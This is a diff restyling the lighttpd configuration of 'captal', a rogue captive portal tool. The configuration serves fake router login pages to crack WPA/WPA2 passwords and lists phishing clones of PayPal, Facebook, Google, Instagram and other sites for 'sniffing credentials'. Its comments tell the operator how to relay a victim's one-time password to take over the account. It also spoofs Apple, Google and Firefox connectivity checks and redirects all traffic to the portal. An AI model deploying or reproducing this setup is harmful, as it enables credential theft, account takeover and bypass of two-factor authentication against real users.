lighttpd.conf: restyle

--- a/cfg/lighttpd.conf
+++ b/cfg/lighttpd.conf
@@ -1,125 +1,131 @@
+#
+# @ETCDIR@/captal/lighttpd.conf: Captive Portal Web Server configuration
+#
+
 # Captive Portal Sites for cracking WPA/WPA2 passwords:
-#server.document-root = "/var/www/captal/sites/Adbepicentro_it.portal"
-#server.document-root = "/var/www/captal/sites/Alice_it.portal"
-#server.document-root = "/var/www/captal/sites/ARRIS_en.portal"
-#server.document-root = "/var/www/captal/sites/ARRIS_es.portal"
-#server.document-root = "/var/www/captal/sites/Asus_it.portal"
-#server.document-root = "/var/www/captal/sites/Bbox_fr.portal"
-#server.document-root = "/var/www/captal/sites/Belkin_en.portal"
-#server.document-root = "/var/www/captal/sites/Belkin_it.portal"
-#server.document-root = "/var/www/captal/sites/Cisco_it.portal"
-#server.document-root = "/var/www/captal/sites/Cisco-Linksys_it.portal"
-#server.document-root = "/var/www/captal/sites/Digicom_it.portal"
-#server.document-root = "/var/www/captal/sites/Djaweb_fr.portal"
-#server.document-root = "/var/www/captal/sites/Dlink_it.portal"
-#server.document-root = "/var/www/captal/sites/Dlink_ru.portal"
-#server.document-root = "/var/www/captal/sites/Freebox_fr.portal"
-#server.document-root = "/var/www/captal/sites/FRITZBox1_en.portal"
-#server.document-root = "/var/www/captal/sites/FRITZBox2_en.portal"
-#server.document-root = "/var/www/captal/sites/FRITZBox_de.portal"
-#server.document-root = "/var/www/captal/sites/GENENIX_de.portal"
-#server.document-root = "/var/www/captal/sites/Google_de.portal"
-#server.document-root = "/var/www/captal/sites/HUAWEI_en.portal"
-#server.document-root = "/var/www/captal/sites/HUAWEI_it.portal"
-#server.document-root = "/var/www/captal/sites/kpn_nl.portal"
-#server.document-root = "/var/www/captal/sites/Livebox_fr.portal"
-#server.document-root = "/var/www/captal/sites/movistar_es.portal"
-#server.document-root = "/var/www/captal/sites/NETGEAR_en.portal"
-#server.document-root = "/var/www/captal/sites/NETGEAR_es.portal"
-#server.document-root = "/var/www/captal/sites/NETGEAR_it.portal"
-#server.document-root = "/var/www/captal/sites/NETGEAR-Login_en.portal"
-#server.document-root = "/var/www/captal/sites/Netis_it.portal"
-#server.document-root = "/var/www/captal/sites/Proximus_fr.portal"
-#server.document-root = "/var/www/captal/sites/Proximus_nl.portal"
-#server.document-root = "/var/www/captal/sites/SFR_fr.portal"
-#server.document-root = "/var/www/captal/sites/Sitecom_it.portal"
-#server.document-root = "/var/www/captal/sites/Technicolor_en.portal"
-#server.document-root = "/var/www/captal/sites/Technicolor_it.portal"
-#server.document-root = "/var/www/captal/sites/Telecom_it.portal"
-#server.document-root = "/var/www/captal/sites/Telekom_de.portal"
-server.document-root = "/var/www/captal/sites/TP-LINK_en.portal"
-#server.document-root = "/var/www/captal/sites/TP-LINK_it.portal"
-#server.document-root = "/var/www/captal/sites/Verizon_en.portal"
-#server.document-root = "/var/www/captal/sites/vodafone_es.portal"
-#server.document-root = "/var/www/captal/sites/Xfinity-Login_en.portal"
-#server.document-root = "/var/www/captal/sites/ziggo1_nl.portal"
-#server.document-root = "/var/www/captal/sites/ziggo2_nl.portal"
-#server.document-root = "/var/www/captal/sites/Zyxel_it.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Adbepicentro_it.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Alice_it.portal"
+#server.document-root = "@WWWDIR@/captal/sites/ARRIS_en.portal"
+#server.document-root = "@WWWDIR@/captal/sites/ARRIS_es.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Asus_it.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Bbox_fr.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Belkin_en.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Belkin_it.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Cisco_it.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Cisco-Linksys_it.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Digicom_it.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Djaweb_fr.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Dlink_it.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Dlink_ru.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Freebox_fr.portal"
+#server.document-root = "@WWWDIR@/captal/sites/FRITZBox1_en.portal"
+#server.document-root = "@WWWDIR@/captal/sites/FRITZBox2_en.portal"
+#server.document-root = "@WWWDIR@/captal/sites/FRITZBox_de.portal"
+#server.document-root = "@WWWDIR@/captal/sites/GENENIX_de.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Google_de.portal"
+#server.document-root = "@WWWDIR@/captal/sites/HUAWEI_en.portal"
+#server.document-root = "@WWWDIR@/captal/sites/HUAWEI_it.portal"
+#server.document-root = "@WWWDIR@/captal/sites/kpn_nl.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Livebox_fr.portal"
+#server.document-root = "@WWWDIR@/captal/sites/movistar_es.portal"
+#server.document-root = "@WWWDIR@/captal/sites/NETGEAR_en.portal"
+#server.document-root = "@WWWDIR@/captal/sites/NETGEAR_es.portal"
+#server.document-root = "@WWWDIR@/captal/sites/NETGEAR_it.portal"
+#server.document-root = "@WWWDIR@/captal/sites/NETGEAR-Login_en.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Netis_it.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Proximus_fr.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Proximus_nl.portal"
+#server.document-root = "@WWWDIR@/captal/sites/SFR_fr.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Sitecom_it.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Technicolor_en.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Technicolor_it.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Telecom_it.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Telekom_de.portal"
+server.document-root = "@WWWDIR@/captal/sites/TP-LINK_en.portal"
+#server.document-root = "@WWWDIR@/captal/sites/TP-LINK_it.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Verizon_en.portal"
+#server.document-root = "@WWWDIR@/captal/sites/vodafone_es.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Xfinity-Login_en.portal"
+#server.document-root = "@WWWDIR@/captal/sites/ziggo1_nl.portal"
+#server.document-root = "@WWWDIR@/captal/sites/ziggo2_nl.portal"
+#server.document-root = "@WWWDIR@/captal/sites/Zyxel_it.portal"
 
 # Sites for sniffing credentials:
 #
-# Logs: See sniffed credentials in site path (/var/www/captal/site/*/log.txt)
+# Logs: See sniffed credentials in site path
+# (@WWWDIR@/captal/site/*/log.txt)
 # TODO: log to syslog in parseable format with IP-address storing.
 #
-# When victim enter his credentials, you need to go to original website and use
-# those credentials to send real OTP to victim. Once he enter that OTP such OTP
-# will also be there with you and you will be allowed to login the account
-# before him.
+# When victim enter his credentials, you need to go to original
+# website and use those credentials to send real OTP to victim.  Once
+# the victim enter that OTP such OTP will also be there with you and
+# you will be allowed to login the account before him.
 #
-# To see all logs, type 'tail -f /var/www/captal/sites/*/log.txt'.
+# To see all logs, type 'tail -f @WWWDIR@/captal/sites/*/log.txt'.
 #
 # Don't forget to comment these settings at the end of this file:
 #
-## Redirect all traffic to the captive portal when not emulating a connection.
+## Redirect all traffic to the captive portal when not emulating a
+## connection.
 #$HTTP["host"] != "captive.gateway.lan" {
 #    url.redirect-code = 302
 #    url.redirect  = (
 #        "^/(.*)" => "http://captive.gateway.lan/",
 #    )
 #}
-#------------------------------------------------------------------------------
+#---------------------------------------------------------------------
 #
-#server.document-root = "/var/www/captal/sites/ajio"
-#server.document-root = "/var/www/captal/sites/amazonsign"
-#server.document-root = "/var/www/captal/sites/cryptocurrency"
-#server.document-root = "/var/www/captal/sites/ebay"
-#server.document-root = "/var/www/captal/sites/facebook"
-#server.document-root = "/var/www/captal/sites/flipcart"
-#server.document-root = "/var/www/captal/sites/github"
-#server.document-root = "/var/www/captal/sites/google"
-#server.document-root = "/var/www/captal/sites/hotstar"
-#server.document-root = "/var/www/captal/sites/instafollow"
-#server.document-root = "/var/www/captal/sites/instagram"
-#server.document-root = "/var/www/captal/sites/linkedin"
-#server.document-root = "/var/www/captal/sites/mobikwik"
-#server.document-root = "/var/www/captal/sites/Netflix"
-#server.document-root = "/var/www/captal/sites/ola"
-#server.document-root = "/var/www/captal/sites/paypal"
-#server.document-root = "/var/www/captal/sites/phonepay"
-#server.document-root = "/var/www/captal/sites/pinterest"
-#server.document-root = "/var/www/captal/sites/protonmail"
-#server.document-root = "/var/www/captal/sites/snapchat"
-#server.document-root = "/var/www/captal/sites/spotify"
-#server.document-root = "/var/www/captal/sites/stackoverflow"
-#server.document-root = "/var/www/captal/sites/telegram"
-#server.document-root = "/var/www/captal/sites/tiktok"
-#server.document-root = "/var/www/captal/sites/twitch"
-#server.document-root = "/var/www/captal/sites/twitter"
-#server.document-root = "/var/www/captal/sites/uber"
-#server.document-root = "/var/www/captal/sites/whatsapp"
-#server.document-root = "/var/www/captal/sites/wordpress"
-#server.document-root = "/var/www/captal/sites/zomato"
+#server.document-root = "@WWWDIR@/captal/sites/ajio"
+#server.document-root = "@WWWDIR@/captal/sites/amazonsign"
+#server.document-root = "@WWWDIR@/captal/sites/cryptocurrency"
+#server.document-root = "@WWWDIR@/captal/sites/ebay"
+#server.document-root = "@WWWDIR@/captal/sites/facebook"
+#server.document-root = "@WWWDIR@/captal/sites/flipcart"
+#server.document-root = "@WWWDIR@/captal/sites/github"
+#server.document-root = "@WWWDIR@/captal/sites/google"
+#server.document-root = "@WWWDIR@/captal/sites/hotstar"
+#server.document-root = "@WWWDIR@/captal/sites/instafollow"
+#server.document-root = "@WWWDIR@/captal/sites/instagram"
+#server.document-root = "@WWWDIR@/captal/sites/linkedin"
+#server.document-root = "@WWWDIR@/captal/sites/mobikwik"
+#server.document-root = "@WWWDIR@/captal/sites/Netflix"
+#server.document-root = "@WWWDIR@/captal/sites/ola"
+#server.document-root = "@WWWDIR@/captal/sites/paypal"
+#server.document-root = "@WWWDIR@/captal/sites/phonepay"
+#server.document-root = "@WWWDIR@/captal/sites/pinterest"
+#server.document-root = "@WWWDIR@/captal/sites/protonmail"
+#server.document-root = "@WWWDIR@/captal/sites/snapchat"
+#server.document-root = "@WWWDIR@/captal/sites/spotify"
+#server.document-root = "@WWWDIR@/captal/sites/stackoverflow"
+#server.document-root = "@WWWDIR@/captal/sites/telegram"
+#server.document-root = "@WWWDIR@/captal/sites/tiktok"
+#server.document-root = "@WWWDIR@/captal/sites/twitch"
+#server.document-root = "@WWWDIR@/captal/sites/twitter"
+#server.document-root = "@WWWDIR@/captal/sites/uber"
+#server.document-root = "@WWWDIR@/captal/sites/whatsapp"
+#server.document-root = "@WWWDIR@/captal/sites/wordpress"
+#server.document-root = "@WWWDIR@/captal/sites/zomato"
 
 
 server.modules = (
-    "mod_access",
-    "mod_alias",
-    "mod_accesslog",
-    "mod_fastcgi",
-    "mod_redirect",
-    "mod_rewrite",
-    #"mod_openssl", # Uncomment in case of using SSL (see below)
+  "mod_access",
+  "mod_alias",
+  "mod_accesslog",
+  "mod_fastcgi",
+  "mod_redirect",
+  "mod_rewrite",
+  #"mod_openssl", # Uncomment in case of using SSL (see below)
 )
 
 accesslog.filename = "/var/log/lighttpd.log"
 
 fastcgi.server = (
-    ".php" => (
-        (
-            "bin-path" => "/usr/bin/php-cgi",
-            "socket" => "/tmp/php.socket"
-        )
+  ".php" => (
+    (
+      "bin-path" => "/usr/bin/php-cgi",
+      "socket" => "/tmp/php.socket"
     )
+  )
 )
 
 server.port = 80
@@ -128,70 +134,74 @@ server.pid-file = "/var/run/lighttpd.pid"
 # server.groupname = "www"
 
 mimetype.assign = (
-    ".html" => "text/html",
-    ".htm" => "text/html",
-    ".txt" => "text/plain",
-    ".jpg" => "image/jpeg",
-    ".png" => "image/png",
-    ".css" => "text/css"
+  ".html" => "text/html",
+  ".htm" => "text/html",
+  ".txt" => "text/plain",
+  ".jpg" => "image/jpeg",
+  ".png" => "image/png",
+  ".css" => "text/css"
 )
 
 server.error-handler-404 = "/"
 
 static-file.exclude-extensions = (
-    ".fcgi",
-    ".php",
-    ".rb",
-    "~",
-    ".inc"
+  ".fcgi",
+  ".php",
+  ".rb",
+  "~",
+  ".inc"
 )
 
 index-file.names = (
-    "index.htm",
-    "index.html",
-    "index.php"
+  "index.htm",
+  "index.html",
+  "index.php"
 )
 
-# To enable SSL, run firstly captal-gencert, to generate the /etc/captal/server.pem.
-# Then, uncomment these lines, add "mod_openssl" to server.modules list, declared above,
-# and (re)start /etc/rc.d/captal-lighttpd.
+# To enable SSL, run firstly captal-gencert, to generate the
+# @ETCDIR@/captal/server.pem.
+# Then, uncomment these lines, add "mod_openssl" to server.modules
+# list, declared above, and (re)start @RCDIR@/captal-lighttpd.
 #$SERVER["socket"] == ":443" {
 #    ssl.engine = "enable"
-#    ssl.pemfile = "/etc/captal/server.pem"
+#    ssl.pemfile = "@ETCDIR@/captal/server.pem"
 #}
 
-################################################################################
-# The following will emulate Apple's and Google's internet connectivity checks.#
-# This should help with no-internet-connection warnings in some devices.       #
-################################################################################
+######################################################################
+# The following will emulate Apple's and Google's internet           #
+# connectivity checks.  This should help with no-internet-connection #
+# warnings in some devices.                                          #
+######################################################################
 
 # Respond with Firefox' captive response.
 $HTTP["host"] == "detectportal.firefox.com" {
-    server.document-root = "/var/www/captal/sites/connectivity_responses/Firefox"
+  server.document-root = "@WWWDIR@/captal/sites/connectivity_responses/Firefox"
 }
 
 # Respond with Apple's captive response.
 $HTTP["host"] == "captive.apple.com" {
-    server.document-root = "/var/www/captal/sites/connectivity_responses/Apple/"
+  server.document-root = "@WWWDIR@/captal/sites/connectivity_responses/Apple/"
 }
 
 # Respond with Google's captive response on certain domains.
 # Domains: www.google.com, clients[0-9].google.com,
 # connectivitycheck.gstatic.com, connectivitycheck.android.com,
-# android.clients.google.com, alt[0-9]-mtalk.google.com, mtalk.google.com
+# android.clients.google.com, alt[0-9]-mtalk.google.com,
+# mtalk.google.com
 $HTTP["host"] =~ "((www|(android\.)?clients[0-9]*|(alt[0-9]*-)?mtalk)\.google|connectivitycheck\.(android|gstatic))\.com" {
-    server.document-root = "/var/www/captal/sites/connectivity_responses/Google/"
-    url.rewrite-once = ( "^/generate_204\$" => "generate_204.php" )
+  server.document-root = "@WWWDIR@/captal/sites/connectivity_responses/Google/"
+  url.rewrite-once = ( "^/generate_204\$" => "generate_204.php" )
 }
-################################################################################
+######################################################################
 
-# Redirect all traffic to the captive portal when not emulating a connection.
+# Redirect all traffic to the captive portal when not emulating a
+# connection.
 $HTTP["host"] != "captive.gateway.lan" {
-    url.redirect-code = 302
-    url.redirect  = (
-        "^/(.*)" => "http://captive.gateway.lan/",
-    )
+  url.redirect-code = 302
+  url.redirect  = (
+    "^/(.*)" => "http://captive.gateway.lan/",
+  )
 }
 
-# vim:ft=perl:sw=4:ts=4:sts=4:et:cc=80
-# End of file
+# vim:ft=perl:sw=2:ts=2:sts=2:et:cc=72:tw=70
+# End of file.
